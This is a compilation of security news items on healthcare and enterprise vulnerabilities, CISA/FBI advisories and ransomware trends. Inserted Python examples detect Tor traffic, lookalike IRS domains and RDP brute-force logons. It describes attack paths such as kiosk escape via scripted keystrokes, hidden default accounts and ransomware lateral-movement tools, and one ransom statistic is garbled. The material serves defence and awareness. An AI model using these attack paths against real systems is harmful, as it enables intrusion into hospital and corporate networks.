The following vulnerabilities were seen in OpenClinic GA Versions 5.09.02 and 5.89.05b:

CVE-2020-14495 – Critical, CVSS v3 base score 9.8. The use of end-of-life third-party components with known vulnerabilities could allow remote arbitrary code execution.

CVE-2020-14487 – Critical, CVSS v3 base score 9.4. An attacker could use a hidden default user account to log in to the application and execute arbitrary commands, unless an administrator has explicitly disabled the account.

CVE-2020-14485 – Critical, CVSS v3 base score 9.4. Client-side access controls can be bypassed to start a session with limited functionality, which provides administrative capabilities to execute SQL commands.

CVE-2020-14493 – High severity, CVSS v3 base score 8.8. Low-privileged users could use SQL syntax to write arbitrary files to the server and execute arbitrary commands.

CVE-2020-14488 – High severity, CVSS v3 base score 8.8. Because uploaded files are insufficiently verified, a low-privileged user may be able to upload arbitrary files and execute them on the system.

Learn more about the CISA medical advisory here.

OpenClinic GA is aware of the vulnerabilities and has taken steps to address them; however, there is no evidence yet that the vulnerabilities have been fixed.

All healthcare companies employing the OpenClinic GA need to upgrade their software to the current version to minimize the likelihood of exploitation.

CISA recommends applying the principle of least privilege, minimizing network exposure for all control system devices and systems, and ensuring they are not accessible from the internet. All systems should be protected by a firewall, and remote access should require a VPN. VPNs should be kept at the most recent version and patched immediately.

Vulnerability Discovered in Capsule Technologies SmartLinx Neuron 2 Medical Data Collection Devices

A high-severity vulnerability has been found in Capsule Technologies SmartLinx Neuron 2 medical data collection devices running software version 6.9.1. SmartLinx Neuron 2 is a portable bedside clinical computer that automatically records vital signs data and connects to the hospital's medical device data systems.

The vulnerability, CVE-2019-5024, is a restricted-environment escape caused by a failure of a protection mechanism in kiosk mode. All versions of Capsule Technologies SmartLinx Neuron 2 before version 9.0 are affected.

Kiosk mode is a restricted environment that prevents users from leaving the running applications and accessing the underlying operating system. An attacker who exploits the vulnerability can leave kiosk mode and use the underlying operating system with full administrative privileges, which could give the attacker complete control of a trusted device on the hospital's internal network.

An attacker must have physical access to the device to exploit the vulnerability. It can be exploited by connecting a keyboard or any other HID device to the device via a USB port. The vulnerability can be triggered with a particular sequence of keystrokes, or with a script that emulates human keyboard input on a device such as a USB Rubber Ducky.

Patrick DeSantis of Cisco Talos discovered the vulnerability and reported it to Capsule Technologies. An attacker with a low level of skill could exploit the vulnerability, and public exploits are available. The CVSS v3 base score of the vulnerability is 7.6 out of 10.

The vulnerability was found in an unsupported software version, but that version is still in use in many hospitals. Capsule Technologies fixed the vulnerability in software version 9.0, and later versions up to the current 10.1 release include the fix.

All device users have been instructed to update to a supported version, which means version 9.0 or later. Physical access to the devices must be restricted as far as practicable, and the devices should be kept outside the organization's security boundary. It is also important to make sure that internal systems do not fully trust the devices. Where possible, USB ports should be disabled or blocked, and logs should be reviewed to identify any unauthorized peripherals connected to vulnerable devices.

FBI and CISA Release Joint Advisory Concerning Threat of Malicious Cyber Activity Via Tor

The FBI and the DHS' Cybersecurity and Infrastructure Security Agency (CISA) recently released a joint advisory about cybercriminals using The Onion Router (Tor) in their attacks.

Tor was created by the U.S. Navy in the 1990s as free, open-source software. Today it is used to browse the web anonymously: the activity of a person using the Tor network cannot easily be traced back to their IP address, because when a Tor user visits a webpage, the IP address of the exit node they connected through is logged instead of their own.

Given the anonymity Tor provides, many threat actors have, as expected, used it to hide their location and IP address and to carry out cyberattacks and other malicious activity without leaving a trace. Cybercriminals use Tor to conduct reconnaissance on targets, execute cyberattacks, access and exfiltrate data, deploy malware and ransomware, and perform Denial of Service (DoS) attacks. According to the advisory, cybercriminals also use Tor to relay commands to ransomware and malware through their command and control (C2) servers.

Because malicious activity can be carried out anonymously, it is difficult for network defenders to respond to attacks and recover systems. CISA and the FBI recommend that organizations conduct a risk assessment to determine their likelihood of compromise via Tor. The risk associated with Tor is unique to each organization, so the assessment should establish the likelihood of an attack via Tor and the probability of success given the mitigations and security controls in place. Before deciding whether to block Tor traffic, it is necessary to consider why legitimate users may choose to use Tor to reach the network. Blocking Tor traffic will improve security, but it will also prevent legitimate Tor users from accessing the network.

CISA and the FBI state that a wide variety of threat actors have used Tor in the past, including nation-state sponsored Advanced Persistent Threat (APT) actors and low-skill attackers. Organizations that neither block inbound and outbound Tor traffic nor closely monitor traffic from Tor nodes will be at higher risk of attack.

In these Tor-based attacks, reconnaissance is performed, targets are selected, and active and passive scans are run to find vulnerabilities in public-facing applications that can then be exploited anonymously. Basic security tools are not enough to detect and block such attacks; instead, a range of security solutions should be deployed and logging should be enabled so that potentially malicious activity can be reviewed using both indicator-based and behavior-based analysis.

The advisory explains that, using an indicator-based approach, network defenders can configure security information and event management (SIEM) tools and other log analysis platforms to flag suspicious activity associated with the IP addresses of Tor exit nodes. The Tor Project's Exit List Service maintains a downloadable list of all Tor exit node IP addresses. Security teams can use the list to identify any significant transactions involving those IP addresses by examining packet captures (PCAP), web server logs, and NetFlow data.

Using a behavior-based approach, network defenders can uncover suspicious Tor activity by looking for the operational behavior of Tor client software and protocols, including the User Datagram Protocol (UDP) and Transmission Control Protocol (TCP) ports they use.
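The two approaches the advisory describes, run over constructed sample data, as an added example (not code from the advisory or from the Tor Project). The exit-node list, the web server log lines and the flow records below are all constructed; the IP addresses come from the RFC 5737 documentation ranges, and the port numbers are the well-known Tor defaults (ORPort 9001, DirPort 9030, SOCKS 9050 and 9150), which is the behavioral indicator the advisory refers to.

```python
"""Indicator- and behavior-based flagging of possible Tor traffic.

Added example, not from the CISA/FBI advisory. The exit-node list, the
web server log lines and the flow records are constructed samples; in
practice the exit list comes from the Tor Project's Exit List Service and
the records from your own web server logs or NetFlow exports.
"""
import ipaddress
import re
from collections import Counter

# Constructed exit-node list: one IP per line, '#' starts a comment.
# 198.51.100.0/24 and 203.0.113.0/24 are RFC 5737 documentation ranges.
SAMPLE_EXIT_LIST = """\
# Tor exit node list (constructed sample)
198.51.100.17
198.51.100.42
203.0.113.9
"""

# Constructed combined-format web server log lines.
SAMPLE_WEB_LOG = """\
198.51.100.17 - - [10/Jul/2020:13:55:36 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Jul/2020:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
198.51.100.17 - - [10/Jul/2020:13:55:41 +0000] "POST /login HTTP/1.1" 401 128 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jul/2020:13:56:02 +0000] "GET /admin HTTP/1.1" 403 77 "-" "curl/7.68.0"
"""

# Constructed NetFlow-like records: (src_ip, dst_ip, dst_port, proto).
SAMPLE_FLOWS = [
    ("10.0.0.23", "203.0.113.44", 443, "tcp"),
    ("10.0.0.23", "203.0.113.45", 9001, "tcp"),   # Tor default ORPort
    ("10.0.0.51", "192.0.2.10", 9030, "tcp"),     # Tor default DirPort
    ("10.0.0.77", "192.0.2.20", 22, "tcp"),
    ("10.0.0.23", "127.0.0.1", 9050, "tcp"),      # local Tor SOCKS proxy
]

# Default ports used by Tor client/relay software (behavioral indicator).
TOR_DEFAULT_PORTS = {
    9001: "ORPort",
    9030: "DirPort",
    9050: "SOCKS",
    9150: "SOCKS (Tor Browser)",
}

# The client address is the first whitespace-delimited field of a log line.
LOG_IP_RE = re.compile(r"^(\S+) ")


def parse_exit_list(text):
    """Return the set of exit-node IPs from exit-list text, skipping comments and blank lines."""
    ips = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ips.add(str(ipaddress.ip_address(line)))  # raises on a malformed address
    return ips


def indicator_hits(log_text, exit_ips):
    """Indicator-based check: number of web requests per Tor exit-node IP."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_IP_RE.match(line)
        if m and m.group(1) in exit_ips:
            hits[m.group(1)] += 1
    return dict(hits)


def behaviour_hits(flows):
    """Behavior-based check: TCP flows to default Tor ports, keyed by internal source host."""
    findings = {}
    for src, dst, port, proto in flows:
        if proto == "tcp" and port in TOR_DEFAULT_PORTS:
            findings.setdefault(src, []).append((dst, port, TOR_DEFAULT_PORTS[port]))
    return findings


if __name__ == "__main__":
    exits = parse_exit_list(SAMPLE_EXIT_LIST)
    print("requests from Tor exit nodes:", indicator_hits(SAMPLE_WEB_LOG, exits))
    print("flows to default Tor ports:", behaviour_hits(SAMPLE_FLOWS))
```

The port-based check is a heuristic: other software can use the same ports and Tor relays can be configured on non-default ports, so its hits are leads for review rather than confirmed Tor use, which is why the advisory pairs it with the exit-list match rather than relying on either alone.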

The FBI and CISA recommend that organizations research and enable the existing Tor detection and mitigation capabilities in their current endpoint and network security products, as these frequently contain effective detection logic. Products such as web application firewalls, router firewalls, and network/host intrusion detection systems may provide some degree of Tor detection.

Although the threat can be reduced by blocking all Tor network traffic, this highly restrictive approach will not eliminate the risk entirely, since not all Tor network entry points are publicly listed, and it will also block legitimate Tor traffic. Tailored monitoring, analysis, and blocking of web traffic to and from public Tor entry and exit nodes may be a more effective solution, although this approach is likely to be resource-intensive.

Specifics of how to deter, monitor and review Tor traffic are given in the advisory, a PDF copy may be downloaded on this page.

Apache Guacamole Remote Access Software Has Serious Vulnerabilities

Several vulnerabilities have been discovered in the Apache Guacamole remote access system. Many companies use Apache Guacamole to give administrators and employees remote access to Windows and Linux machines. The system gained popularity during the COVID-19 pandemic for letting people work from home while staying connected to the corporate network. Apache Guacamole is embedded in many network access and security solutions, including Quali, Fortress, and Fortigate, and is a prominent tool with over 10 million Docker downloads.

Apache Guacamole is a clientless service, meaning remote employees do not need any software installed on their devices; a web browser is enough to reach their company machine. The software is installed only by system administrators on a server. Depending on the configuration, a connection is established using SSH or RDP, with Guacamole acting as a gateway that relays communications between the web browser and the remote machine.

Check Point Research examined Apache Guacamole and identified several reverse RDP vulnerabilities in version 1.1.0 and earlier, as well as the same vulnerability in FreeRDP, which is Apache's free RDP implementation. Remote attackers can exploit the vulnerabilities to gain code execution, allowing them to hijack servers and intercept sensitive information by eavesdropping on remote sessions. The researchers note that in a scenario where everyone is working remotely, exploiting these vulnerabilities would amount to gaining full control of the entire organizational network.

Check Point Research described two ways to exploit the vulnerabilities. An attacker who has already compromised a desktop computer and has access to the network can exploit the vulnerabilities in the Guacamole gateway as soon as a remote worker tries to log in and access the machine; the attacker can then control the gateway and its remote networks. A malicious insider can also exploit the vulnerabilities to access the computers of other employees on the network.

The vulnerabilities permit Heartbleed-style data disclosure and read and write access on the vulnerable server. The researchers chained the vulnerabilities, escalated privileges to admin, and obtained remote code execution. Check Point Research reported the chained vulnerabilities, CVE-2020-9497 and CVE-2020-9498, to the Apache Software Foundation, and patches were released on June 28, 2020.

The researchers also found that the FreeRDP vulnerability CVE-2018-8786 can be exploited to take control of the gateway. All versions released before January 2020, which predate FreeRDP 2.0.0-rc4, use vulnerable FreeRDP versions and are affected by CVE-2020-9498.

All companies that have used Apache Guacamole must make sure they have the most recent version of Apache Guacamole set up on their servers.

CISA Warning About an Ongoing Ransomware Campaign Exploiting RDP and VPNs Vulnerabilities

The DHS Cybersecurity & Infrastructure Security Agency (CISA) has issued a warning about an ongoing Nefilim ransomware campaign, following a security bulletin from the New Zealand Computer Emergency Response Team (CERT NZ).

Nefilim ransomware is the successor to Nemty ransomware, which was first discovered in February 2020. Unlike Nemty, Nefilim is not distributed under the ransomware-as-a-service model; the ransomware developers conduct their own attacks and deploy the ransomware manually after gaining access to enterprise networks.

As with other manually operated ransomware gangs, the victim's data is stolen before the ransomware is deployed, and the gang then threatens to publish or sell the stolen data if the ransom is not paid. The gang gains access to enterprise networks through vulnerabilities in virtual private networks (VPNs) and the remote desktop protocol (RDP), using brute force techniques to take advantage of weak authentication, the absence of multi-factor authentication, and unpatched flaws in VPN software.

Once the attackers gain a foothold in the network, they use tools such as Mimikatz, Cobalt Strike, and PsExec for lateral movement, privilege escalation, and exfiltration of sensitive information.

The Nefilim ransomware gang is highly skilled and conducts sophisticated, well-crafted attacks. The extent of network infiltration means that it is not possible to recover from an attack merely by restoring data from backups. A thorough forensic investigation is required to fully understand the attack, identify and remove backdoors, and evict the attackers from the network for good.

All companies that use unsecured remote access systems are at risk. To prevent an attack, it is important to address RDP vulnerabilities and to fully patch and update remote access software. Strong authentication must be used and multi-factor authentication must be enabled.

Network segmentation and application whitelisting can help limit the severity of an attack. It is crucial to monitor networks and remote access systems for signs of unauthorized access. Backups must be made routinely, and one backup copy must be stored securely on an air-gapped device or media that has no network access.

Alert Issued by Feds to Increase Awareness of Scams Associated to COVID-19 Economic Payments

The IRS, the DHS' Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury have issued a joint advisory to raise awareness of the threat of phishing and other cyberattacks related to the Coronavirus Aid, Relief, and Economic Security (CARES) Act.

The CARES Act makes $2 trillion in funding available to help businesses and individuals harmed by the COVID-19 pandemic, easing the financial burden through economic impact payments to eligible Americans. Cybercriminals are using CARES Act payments as a lure in phishing attacks to obtain personal and financial data and to attempt to redirect CARES Act payments. All U.S. citizens are advised to watch out for scams related to the CARES Act and COVID-19.

The U.S. Government reports that many cybercriminal groups are using stimulus-themed lures in phishing emails and SMS messages to obtain sensitive data such as bank account details. Financial institutions have been asked to tell their customers to follow good cybersecurity practices and to watch for suspicious account use and account creation.

Criminals are using CARES Act-themed email messages and websites to obtain sensitive data, spread malware, and gain access to computer networks. Themes include loan and grant programs, personal checks, economic stimulus, and other topics related to the CARES Act. These CARES Act-related criminal campaigns could support a broad range of follow-on activity that could harm the implementation of the CARES Act.

Threat actors may also try to disrupt the operations of agencies responsible for implementing the CARES Act, for example by using ransomware to disrupt the flow of CARES Act funds and extort money from the victims. Federal, state, local, and tribal organizations have been told to examine their loan processing, payment, and banking systems and to strengthen security to stop attacks.

Overseas threat actors have been found submitting fraudulent claims for COVID-19 relief money, including one Nigerian business email compromise (BEC) group known to have submitted over 200 fraudulent claims for CARES Act payments and unemployment benefits. The group, known as Scattered Canary, has been filing claims through state unemployment websites to obtain payments using information stolen in W-2 phishing attacks. The group has filed at least 174 fraudulent claims in Washington state and over 12 claims in Massachusetts, and around 8 states have been targeted so far.

The U.S. Government has been sharing threat intelligence and cybersecurity best practices to help disrupt and prevent criminal activity. The U.S. Secret Service is currently focused on investigations to identify individuals exploiting the crisis, bring them to justice, and recover money lost to fraud.

The IRS has told taxpayers that it will not initiate contact by email, SMS, or social media to request personal and financial data such as bank account numbers, PINs, and credit card details. The IRS has warned Americans that copycat websites may be set up to harvest sensitive data and advised them to carefully check any domain for transposed letters or mismatched SSL certificates. The IRS only uses www.irs.gov and the IRS-run website https://www.freefilefillableforms.com/.
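The IRS's advice to check a domain for transposed or missing letters can be turned into an automated check for a mail gateway or a user-reported link. The code below is an added example, not part of the advisory or any IRS tooling: it compares a candidate host name against the two domains the advisory names, using an edit distance that counts an adjacent transposition as a single change, and also catches the pattern where a trusted name is used as a subdomain of someone else's domain. The candidate hosts in the usage section are constructed samples, not known phishing sites.

```python
"""Lookalike-domain check for links that claim to come from the IRS.

Added example, not from the IRS/CISA/Treasury advisory. TRUSTED_DOMAINS
holds the two sites the advisory says the IRS uses; everything else is
an assumption or a constructed sample.
"""

# The two sites the advisory names; 'www.' variants reduce to these.
TRUSTED_DOMAINS = {"irs.gov", "freefilefillableforms.com"}


def registrable(host):
    """Reduce a host name to its last two labels: 'www.irs.gov' -> 'irs.gov'.
    Assumption: no two-label public suffixes (such as co.uk) are involved."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def osa_distance(a, b):
    """Optimal string alignment distance: insertions, deletions, substitutions
    and adjacent transpositions each cost 1, so 'isr.gov' is 1 from 'irs.gov'."""
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[-1][-1]


def classify(host, trusted=TRUSTED_DOMAINS, max_distance=2):
    """Return 'trusted', 'lookalike' or 'unrelated' for a host name.
    max_distance is an assumed tuning value: 2 catches one transposition
    plus one dropped or swapped character without flagging unrelated names."""
    host = host.lower().rstrip(".")
    reg = registrable(host)
    if reg in trusted:
        return "trusted"
    for t in trusted:
        # A trusted name used as a subdomain of another domain
        # ('irs.gov.payment-verify.com') is a classic impersonation pattern.
        if ("." + host).find("." + t + ".") != -1:
            return "lookalike"
        # Transposed, missing or substituted characters in the registrable part.
        if osa_distance(reg, t) <= max_distance:
            return "lookalike"
    return "unrelated"


if __name__ == "__main__":
    # Constructed samples; the lookalike names are illustrative, not known sites.
    for h in ["www.irs.gov", "www.isr.gov", "irs.gov.payment-verify.com",
              "freefilefillableform.com", "example.com"]:
        print(f"{h:30} {classify(h)}")
```

The certificate half of the advice (a mismatched SSL certificate) cannot be checked offline; it needs a live TLS connection to the host so the certificate's subject names can be compared with the host name, which this example deliberately leaves out.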

All people in America were informed to be wary and keep track of their financial accounts for indicators of bogus activity and to report incidents of phishing attacks and other frauds to the proper authorities. They should also inform their employer when they think they fall victim to a scam and disclosed sensitive data regarding their company.

The advisory, Avoid Scams Related To Economic Payments, COVID-19, is available on this page.

CISA and FBI Reveal Top 10 List of Exploited Vulnerabilities

The FBI and the Cybersecurity and Infrastructure Security Agency recently published a joint public service announcement describing the top ten most exploited vulnerabilities from 2016 to 2019. Sophisticated nation-state hackers are exploiting these vulnerabilities to attack companies both in the public and private industries to access their systems to steal sensitive information.

Hacking groups connected to China, Russia, Iran, and North Korea widely exploit the vulnerabilities in the list. Their cyber actors still perform attacks taking advantage of the vulnerabilities, although patches were already available to correct the vulnerabilities. In certain instances, patches were available for over 5 years, but a number of companies have yet to apply the patches.

If attackers exploit the vulnerabilities included in the top 10 list, fewer resources are required as compared to zero-day exploits. That means they could conduct more attacks. If companies apply the patches to resolve the top 10 vulnerabilities, it will force nation-state hackers to create new exploits that will restrict their ability to perform attacks.

CISA and the FBI explain in the announcement that a concerted campaign to patch these vulnerabilities would introduce friction into foreign adversaries' operational tradecraft and force them to develop or acquire exploits that are more expensive and less widely effective. A concerted patching campaign would also strengthen network security by focusing scarce defensive resources on the observed activities of foreign adversaries.

CISA and the FBI hope the list will help organizations prioritize patching, and urge all organizations to invest more time and resources in patching and to establish a program that keeps all systems patched going forward.

Top 10 Consistently Exploited Vulnerabilities

The consistently exploited vulnerabilities in the top ten list affect Adobe Flash Player, Microsoft SharePoint, Microsoft Windows, Microsoft Office, Microsoft .NET Framework, Apache Struts, and Drupal. Of the ten, most nation-state hacking groups have focused on just three vulnerabilities in Microsoft's OLE technology – CVE-2017-11882, CVE-2012-0158 and CVE-2017-0199. Microsoft's Object Linking and Embedding (OLE) allows content from other applications to be embedded in Word documents. The fourth most frequently exploited vulnerability is CVE-2017-5638 in the Apache Struts web framework. These vulnerabilities have been exploited to deliver a variety of malware payloads, including Loki, Pony/FAREIT, FormBook, FINSPY, LATENTBOT, JexBoss, Dridex, China Chopper, DOGCALL, FinFisher, WingBird, and Kitty.

  1. Vulnerability CVE-2017-11882 affects Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products
  2. Vulnerability CVE-2017-0199 affects Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1
  3. Vulnerability CVE-2017-5638 affects Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1
  4. Vulnerability CVE-2012-0158 affects Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; BizTalk Server 2002 SP1; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; Visual Basic 6.0; and Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2;
  5. Vulnerability CVE-2019-0604 affects Microsoft SharePoint
  6. Vulnerability CVE-2017-0143 affects Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT
  7. Vulnerability CVE-2018-4878 affects Adobe Flash Player before 28.0.0.161
  8. Vulnerability CVE-2017-8759 affects Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7
  9. Vulnerability CVE-2015-1641 affects Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1
  10. Vulnerability CVE-2018-7600 affects Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1

A warning was also issued about two further vulnerabilities – the Citrix vulnerability CVE-2019-19781 and the Pulse Secure VPN vulnerability CVE-2019-11510 – which were exploited in attacks in 2020. Both involve Virtual Private Network (VPN) solutions and are exploited by nation-state hackers and cybercriminal groups alike.

The rush to adopt cloud collaboration services such as Microsoft Office 365 so that employees could work remotely during COVID-19 has given hackers new avenues for attacking organizations. Hasty deployments of these services have led to oversights in security settings that leave them vulnerable to attack. Other cybersecurity weaknesses are also being exploited, including poor employee training on phishing and social engineering. The lack of system recovery and backup plans has additionally put organizations at risk of ransomware attacks.

Guidance for Healthcare Organizations on Avoiding and Identifying Human-Operated Ransomware Attacks

Human-operated ransomware attacks on healthcare providers and critical infrastructure increased during the COVID-19 crisis. Many attacks on healthcare providers have occurred in recent weeks, including Parkview Medical Center, Brandywine Counselling and Community Services, and ExecuPharm.

Many ransomware attacks are automated and begin with a phishing email; once the ransomware is installed, it usually starts encrypting within an hour. Human-operated ransomware attacks are different. Access to systems is gained weeks or months before the ransomware is deployed, and during that time the attackers harvest credentials, move laterally, and collect and exfiltrate data before the ransomware encrypts files.

The attackers may lie dormant in systems for months before deploying the ransomware at the point of maximum disruption. The COVID-19 crisis is an ideal time to deploy ransomware on healthcare providers and other institutions involved in the COVID-19 response, since there is a greater likelihood that the ransom will be paid to ensure a fast recovery.

According to Microsoft's data, in the first two weeks of April many attacks were carried out by a variety of sophisticated cybercriminal groups on healthcare organizations, research and pharmaceutical companies, medical billing firms, and suppliers to the healthcare sector, alongside attacks on educational software companies, manufacturers, government organizations, and aid organizations.

Human-operated ransomware attacks were observed using the following 10 ransomware variants: Maze, RobbinHood, PonyFinal, Valet Loader, REvil (Sodinokibi), NetWalker, RagnarLocker, Paradise, LockBit and MedusaLocker. Although the ransomware variants differ, the attacks typically follow the same pattern: the attackers first gain access to systems, then steal credentials, move laterally, exfiltrate sensitive information, and establish persistence before deploying the ransomware payload.

Microsoft has published information about how the attackers gain access to systems to help network defenders strengthen their defenses and block attacks. Although there are several possible ways to attack an organization, these threat actors generally use similar methods to gain access.

One of the most common methods of attack is via Remote Desktop Protocol or Virtual Desktop endpoints that lack multi-factor authentication, often using stolen credentials or brute force attempts to guess weak passwords. Without multi-factor authentication, attackers can use stolen credentials to access systems, and because valid credentials are used, network defenders may not notice the attackers on their networks.

Flaws in internet-facing systems are often exploited, for example misconfigured web servers, backup servers, EHRs, and systems management servers. Unpatched vulnerabilities are also frequently exploited: some of the April 2020 attacks involved the Pulse Secure VPN flaw CVE-2019-11510 and the Citrix Application Delivery Controller (ADC) vulnerability CVE-2019-19781. Flaws in unsupported operating systems are exploited as well. To prevent attacks, it is important to update operating systems and apply patches promptly after release.

These attacks do not deploy ransomware quickly for a fast payout. The threat actors take their time to obtain administrative credentials and move laterally with the aim of penetrating the organization's entire network, including inboxes, EHRs, endpoints, and applications. Most of the attacks involved data exfiltration, with the intention of selling the data for profit, using it for other nefarious purposes, or pressuring the organization into paying the ransom.

The interval between the initial compromise and the deployment of ransomware gives network defenders a chance to detect and stop the attacks. Although threat actors try to hide their activity, it is possible to spot them as they move laterally. Network defenders should look for activity that may indicate an ongoing attack, including the use of penetration-testing tools. Security logs must be inspected for signs of tampering, and registry changes and suspicious access to the Local Security Authority Subsystem Service (LSASS) should also be identified.
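Both the Nefilim warning above and Microsoft's guidance single out RDP endpoints without multi-factor authentication, attacked with brute force or stolen credentials, as a primary entry point, and this section advises inspecting security logs. The following added example (not from CISA, CERT NZ or Microsoft) shows one such check over Windows Security event records: a source address that accumulates a burst of failed RDP logons (event ID 4625, logon type 10, which Windows uses for RemoteInteractive sessions) and then logs on successfully (event ID 4624) is the signature of password guessing that worked. The event records are constructed for illustration, and the threshold and time window are assumptions to be tuned to the environment.

```python
"""Detect RDP password guessing that ends in a successful logon, from
Windows Security event records.

Added example, not from the CISA/CERT NZ bulletin or Microsoft's guidance.
The event records are constructed; in practice they would come from a SIEM
export or a Get-WinEvent/wevtutil dump of the Security log.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed events: (timestamp, event_id, account, source_ip, logon_type).
# 4625 = failed logon, 4624 = successful logon, logon type 10 = RDP.
# 203.0.113.0/24 is an RFC 5737 documentation range, not a real attacker.
SAMPLE_EVENTS = [
    ("2020-07-10T02:00:01", 4625, "administrator", "203.0.113.77", 10),
    ("2020-07-10T02:00:03", 4625, "administrator", "203.0.113.77", 10),
    ("2020-07-10T02:00:05", 4625, "admin",         "203.0.113.77", 10),
    ("2020-07-10T02:00:07", 4625, "backup",        "203.0.113.77", 10),
    ("2020-07-10T02:00:09", 4625, "it-support",    "203.0.113.77", 10),
    ("2020-07-10T02:00:11", 4625, "it-support",    "203.0.113.77", 10),
    ("2020-07-10T02:00:14", 4624, "it-support",    "203.0.113.77", 10),
    ("2020-07-10T08:15:00", 4625, "jsmith",        "10.0.0.12",    10),  # one typo, then success
    ("2020-07-10T08:15:20", 4624, "jsmith",        "10.0.0.12",    10),
    ("2020-07-10T09:00:00", 4624, "svc-backup",    "10.0.0.5",     3),   # network logon, not RDP
]

# Assumed tuning values: this many failures inside this window counts as guessing.
FAIL_THRESHOLD = 5
WINDOW = timedelta(minutes=10)

RDP_LOGON_TYPE = 10
EVENT_LOGON_FAILED = 4625
EVENT_LOGON_SUCCESS = 4624


def detect_rdp_bruteforce(events, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return one alert per source address that accumulated `threshold` failed
    RDP logons within `window` and then logged on successfully."""
    failures = defaultdict(deque)   # source_ip -> timestamps of recent failures
    accounts = defaultdict(set)     # source_ip -> account names tried
    alerts = []
    # Sorting by the ISO timestamp string keeps the events in time order.
    for ts_str, event_id, account, src, logon_type in sorted(events):
        if logon_type != RDP_LOGON_TYPE:
            continue
        ts = datetime.fromisoformat(ts_str)
        recent = failures[src]
        while recent and ts - recent[0] > window:   # slide the window forward
            recent.popleft()
        if event_id == EVENT_LOGON_FAILED:
            recent.append(ts)
            accounts[src].add(account)
        elif event_id == EVENT_LOGON_SUCCESS and len(recent) >= threshold:
            alerts.append({
                "source": src,
                "account": account,
                "failures": len(recent),
                "accounts_tried": sorted(accounts[src]),
                "success_at": ts_str,
            })
            recent.clear()          # start a fresh window after reporting
            accounts[src].clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

A hit on this rule is a reason to treat the account as compromised and the source address as hostile, not merely to reset a password: in the human-operated attacks described above, the successful logon is the start of weeks of credential harvesting and lateral movement, so the response is to isolate and investigate rather than wait for further signs. The same pattern over VPN authentication logs covers the other entry point both advisories name.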

Microsoft also provides comprehensive advice on fortifying security to stop attacks and the guidelines for investigation, the seclusion of compromised endpoints, and restoration in case an attack is discovered.

Ransomware Attackers Likely to Target Small to Medium-Sized Healthcare Organizations

A new RiskIQ report states that ransomware groups are focusing their campaigns on smaller healthcare companies and clinics. Healthcare organizations with fewer than 500 employees account for 70% of all reported successful healthcare ransomware attacks since 2016.

RiskIQ studied 127 healthcare ransomware attacks and found that attacks increased by 35% from 2016 to 2019. 51% of ransomware attacks were on hospitals and healthcare centers, 24% were on medical practices, and 17% were on health and wellness facilities.

Smaller healthcare providers are likely to have less effective cybersecurity defenses than larger ones. RiskIQ states that 85% of SME hospitals lack a qualified IT security officer, so gaps in security go unaddressed. Paying the ransom is the more likely course of action in order to avoid the costly downtime caused by an attack; if the ransom is not paid, recovery often takes several weeks.

A Perfect Storm of New Targets and Methods

According to the RiskIQ intelligence brief "Ransomware in the Health Sector 2020," there is "a perfect storm of new targets and methods" because of the digital transformation of healthcare, and recent events have exposed the healthcare sector to many more attacks. The 2019 Novel Coronavirus outbreak forced healthcare organizations to make major changes almost overnight: workforces and business operations were decentralized, protection gaps widened, and visibility into attack surfaces decreased.

A number of ransomware groups have stated that they will not attack healthcare providers during the COVID-19 public health emergency, but a few groups have not made that commitment. Attacks are easier now, and those groups are taking advantage of the situation. Because cybercriminals are exploiting coronavirus-related problems, there is a surge in malicious online activity that is likely to affect healthcare facilities and COVID-19 responders.

Ransom Payment is Not a Guarantee of File Recovery

16% of healthcare ransomware attack victims reported paying the ransom to obtain the file decryption keys; the average ransom payment in those attacks was $59,000. Although paying the ransom is an option, the FBI does not recommend it because it only encourages further attacks and file recovery is not guaranteed. A Wall Street Journal article noted that less than 50% of decryption keys fail to work, so some data loss is unavoidable even after the ransom is paid. There have also been cases where attackers demanded a second payment after the first before providing the decryption keys. Paying a ransom also signals to ransomware gangs that the target is likely to pay if attacked, so the healthcare provider may be targeted again, by the same attacker or by others.

